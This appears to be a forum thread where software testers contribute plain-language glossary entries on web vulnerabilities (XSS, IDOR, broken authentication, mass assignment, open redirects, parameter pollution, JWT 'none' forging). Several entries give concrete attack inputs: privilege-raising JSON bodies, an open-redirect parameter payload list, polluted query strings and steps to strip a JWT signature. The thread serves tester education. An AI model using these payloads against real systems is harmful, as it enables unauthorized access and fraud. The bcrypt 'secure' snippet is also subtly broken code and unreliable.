Can you simply explain a web security risk you think testers should know about?

toptal.com list these as the 10 Common Web Security Vulnerabilities

  1. Injection Flaws
  2. Broken Authentication
  3. Cross-Site Scripting (XSS)
  4. Insecure Direct Object References (IDOR)
  5. Security Misconfiguration
  6. Sensitive Data Exposure
  7. Missing Function Level Access Control
  8. Cross-Site Request Forgery (CSRF)
  9. Using Components With Known Vulnerabilities
  10. Unvalidated Redirects and Forwards

We would love to create a community-curated collection of glossary entries that:

  • explains what each of these thing is,
  • offers a tip or two for testers and teams to reduce the risk,
  • plus anything you’d want someone new to security to know about it.

Simple, practical, and in your words. Can you help?

You don’t need to do them all, just pick one or two that interest you. Or if you think something’s missing, go ahead and do your own thing.

Drop your contribution in reply to this post. Your entry will show on your profile and in the glossary collection, and you’ll earn a community star :star:

8 Likes

Sensitive Data Exposure is a common web security vulnerability where applications expose sensitive information such as passwords, credit card numbers, health records, or personal information due to poor security practices.

Examples:

  • Data sent over HTTP instead of HTTPS.
  • Passwords stored in plain text.
  • Weak or outdated encryption (e.g: using MD5 or SHA-1) instead use: bcrypt, scrypt, or Argon2 & salt.
  • Data leakage via verbose error messages, logs, or browser storage.
❌ Insecure: storing plaintext password

user_data = {
    "username": "aiman",
    "password": "mysecretpassword"
}

âś… Secure: hash + salt the password

import bcrypt, hashlib

password = "mysecretpassword"
salt = bcrypt.gensalt()
hashed = bcrypt.hashpw(password, salt)

username = "aiman"
hashed_username = hashlib.sha256(username.encode()).hexdigest()

I have known this vulnerability, taken the solution from internet :slight_smile: Thanks.

5 Likes

With inspiration from the CIS18 organizational security practices, I would add an additional item to the list. While similar to #9, it’s about what was already trusted.

Supply chain attack Your web app will depend on libraries and stuff outside your control. SoMe trackers, CSS or similar plugins. Over time they might be insecure or outdated. Keep a list of them, and a last working version on your end.

One famous example was log4j and SolarWinds.

BTW: The list above seem similar to the Owasp analysis of 2021, they have a new analysis out later this year.

2 Likes

Thanks @jesper,

@fullsnacktester spotted the same similarity on my Slack post about this, I think.

Thank you for contributing here and on LinkedIn! I’ll be putting this collection together in a few weeks, but I’ll keep an eye out for updates from OWASP. :folded_hands: Brilliant tip, thanks! I hope the collection is something we keep adding to.

2 Likes

@sarahdeery

Cross-Site Scripting (XSS):

In this case, an attacker uses malicious scripting to interfere with a trusted website. Since the site doesn’t sanitize user input, the script can be executed in user’s browser generally to steal the cookies or session data.

Tester tip:

Try using harmless scripts such as in input fields or URLs. If it actually executes, then the site is vulnerable.

Pro tip:

Always escape and validate all user inputs.

Thanks,
Ramanan

1 Like

Broken Authentication means that a web application’s login system or session management is flawed, letting attackers bypass authentication and gain unauthorized access to sensitive accounts—sometimes even administrative ones. Attackers exploit these issues through methods like stolen or weak credentials, brute-force attacks, or hijacking session identifiers. [1][2]

Problem Areas

  • Credential Management: Weak or default passwords, poor password storage (no hashing/salting), or flaws in password recovery make it easier for attackers to steal or guess passwords.
  • Session Management: Vulnerabilities in how sessions are created, tracked, or terminated can lead to session hijacking—where attackers impersonate users by stealing session IDs, often through poorly protected browser cookies or unexpired sessions. [3]

Tips for Testers

  • Test for Common Weaknesses
    • Try default and weak passwords (“password”, “admin”, “123456”, etc.) and check the application’s password policies.
    • Attempt brute-force and credential stuffing attacks (within allowed scope) to verify protections.
  • Check Session Management
    • Confirm that session tokens are not leaked in URLs and are changed after login.
    • Validate session termination: users should be logged out everywhere after logging out or timing out.
  • Explore Forgot-Password and Recovery Flows
    • Test for predictable, non-expiring, or re-usable reset tokens.
    • Check for error messages or flow differences that might leak whether an account exists.

What New Security Testers Should Know

Broken authentication is one of the most impactful vulnerabilities, often leading to data breaches or account takeovers—even on major platforms.

Sources (Thanks to Perplexety AI for supporting the search [4]):

  1. Port Swigger (Home of BurpSuite, well know security tool)
  2. Bright Security
  3. OWASP API2:2023 Broken Authentication
  4. Prompt

On the list 10 Common Web Security Vulnerabilities you find “Broken Authentication”. Describe shortly for a tester community

  • explains what each of these thing is,
  • offers a tip or two for testers and teams to reduce the risk,
  • plus anything you’d want someone new to security to know about it.
2 Likes

This is called Open Redirect vulnerability.

Other vulnerabilities that are known to testers.. there are so many to name literally hundreds different kinds :smiley:

IDORs one of the most common vulnerabilities on bug bountry programs is probably “THE ONE” to know (which is on your list Nr 4).

If a URL is https://example.com/profile?user_id=123 and the application doesn’t verify if the user accessing the page is actually user 123, someone could change the user_id to 456 and access that user’s profile and edit it.

2 Likes

Check the URL of the downloaded file.

E.g. it is possible to upload a CV into a job application web site. The user can download the latest version to check for necessary updates.

  • Copy the URL of the downloaded document to a word processor.
  • Use another user id and password to log in.
  • Paste the copied URL in the address text field and press return.
  • If the document is shown, then other users can access personal data.

A more advanced trick is to change the name of the previously updoaded file in the URL.
E.g. replace CV_John_Smith.pdf by CV_Peter_Jones.pdf.

2 Likes

That’s classified as an IDOR :stuck_out_tongue:

2 Likes

Thanks for the brill input on this thread, along with insights shared in the MoT Slack and on LinkedIn. We’ve pulled together 17 clear, practical explanations of critical security risks, each with examples and top tips.

Big thanks to Hanisha Arora, Jesper Ottosen, Richard Adams, Emily O’Connor, Lewis Prescott, Kristof Van Kriekingen, Adam Davis, Aiman B T Syed, Ramanan Prabakaran, Han Lim, and Joerg for sharing their wisdom :folded_hands:

You can explore the collection here :backhand_index_pointing_right: https://www.ministryoftesting.com/collections/common-security-risks-explained-by-the-motaverse

4 Likes

Great efforts and valuable collection! :clap:

1 Like

Another fun one is “Mass Assignment Vulnerability”

It happens when an application automatically maps user provided data (e.g. from an HTTP request) into internal objects or models without controlling which fields can be set. If the developer doesn’t explicitly whitelist allowed fields, attackers can supply extra parameters to modify sensitive attributes they shouldn’t be able to touch like admin flags, account balances, discounts, etc… (as long as they map to the internal systems)

Example 1: You are updating your own user profile and you see this in the swagger & network tab:

{
“name”: “Kristof”,
“email”: “kristof@example.com”
}

When you then could do is change the request body to this:

{
“name”: “Kristof”,
“email”: “kristof@example.com”,
”isAdmin”:true
}

The value “isAdmin” is highly unlikely to be called that. That’s why it’s often enumerated and tested with scripting. Since it could be role, roles, admin, … anything really. BUT when whitebox testing, you know the value in the code. Also it might not be “true” but it might be a number or a name of a specific role.

So it could also be:

{
“name”: “Kristof”,
“email”: “kristof@example.com”,
”tenantRole”:”Admin”
}

That’s the beauty of blackbox pentesting, you’ll have to try a lot blindly.

A tip: Often in the reponses of the API it might note the correct name of the field, which can already help you.

So if you were to do a GET Profile request of yourself it might say this:

{
“name”: “Kristof”,
“email”: “kristof@example.com”,
”RoleId”:2
}

And then you can easily try all the different values to see if it gets updated or not.


People often think mass assignment is only used in access management but you can totally do this in a webshop also to provide discounts.

{
“orderId”: 12345,
“address”: “123 Main Street”,
“phone”: “555-1234”,
”item”:”X-Box”
}

And add in something like:

{
“orderId”: 12345,
“address”: “123 Main Street”,
“phone”: “555-1234”,
”item”:”X-Box”,
”discount”: 0.9
}

2 Likes

There is also “Open Redirects”

With an open redirect vulnerability, the idea is to get the user to redirect to a malicious website.

An example would be:

https://example.com/redirect?url=evilwebsite.com

In pentesting, we don’t really use evil website except our own hosted sites in order to chain this vulnerability.

So it’s one thing to create a url with an open redirect in it, and it’s another thing to permanently store it inside the application. It can be used in phishing campaigns as people will see the real domain of the client and not the extensions.

By itself it’s a lesser vulnerability and that’s why it’s often required to chain it to something else.

There are a LOT of parameters you can try and might be supported in your application, some example from PayloadAllTheThings:

?checkout_url={payload}
?continue={payload}
?dest={payload}
?destination={payload}
?go={payload}
?image_url={payload}
?next={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
?return_path={payload}
?return_to={payload}
?return={payload}
?returnTo={payload}
?rurl={payload}
?target={payload}
?url={payload}
?view={payload}
/{payload}
/redirect/{payload}

Which can be used to create a script of it.

A cool one that always works due to browser behavior (but it’s also super obvious is @ after the URL). For example: https://www.ministryoftesting.com@google.com/

Extra payload list: PayloadsAllTheThings/Open Redirect at master · swisskyrepo/PayloadsAllTheThings · GitHub


Extra info:

2 Likes

Parameter Pollution

“HTTP Parameter Pollution” happens when an attacker sends multiple parameters with the same name in a single HTTP request which is easily tested by every tester I might add!

For example there is a webshop and you are purchasing the following via API

https://shop.example.com/cart?productId=123&quantity=1

We can see the productId and the quantity.

  • productId=123
  • quantity=1

These are the parameters and in the example we’ll try to pollute quantity. So we add another of the same parameter with a different value.

/cart?productId=123&quantity=1&quantity=999

and basically hope that we receive a 1000 items :slight_smile:

This can be done with any parameter if not validated on the backend.

/getProfile?userId=1&userId=2

Which might make return value of other users which you are not allowed to see!

1 Like

JWT Hacking with the “none” algorithm

The JWT “none” algorithm vulnerability is like accepting an important contract just because the first page says “no signature needed.” Normally, a JWT is like a digital ID card that’s signed so the server can verify it hasn’t been tampered with. The “header” section of the JWT tells the server which signature method to use. In this vulnerability, an attacker changes the header to say “alg”: “none”, meaning “don’t check the signature” and then you edit the contents to give yourself higher privileges

A JWT often looks like this:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30

It’s separated by 3 dots in header.payload.signature

When you decode the JWT of for example: https://www.jwt.io/
You can read the values of the token and the header will say:

{
“alg”: “HS256”,
“typ”: “JWT”
}

It’s usually signed with a secret or private key so the receiver can verify the data hasn’t been changed. Which is linked to the 3rd part of the JWT “signature” the header part above usually states which algorithm is used. In this example HS256.

You can edit these values and regenerate a JWT token and that’s what we’ll do. We’ll change the alg to “none” and remove the signature completely, meaning there is no signature required.

{
“alg”: “none”,
“typ”: “JWT”
}

In the payload (optional) you can then edit the values also like:

{
“sub”: “1234567890”,
“name”: “Kristof”,
“admin”: true
}

If you wish to try it out yourself: Attacking JWT authentication

Funny fact: JWT is actually pronounced “jot”

1 Like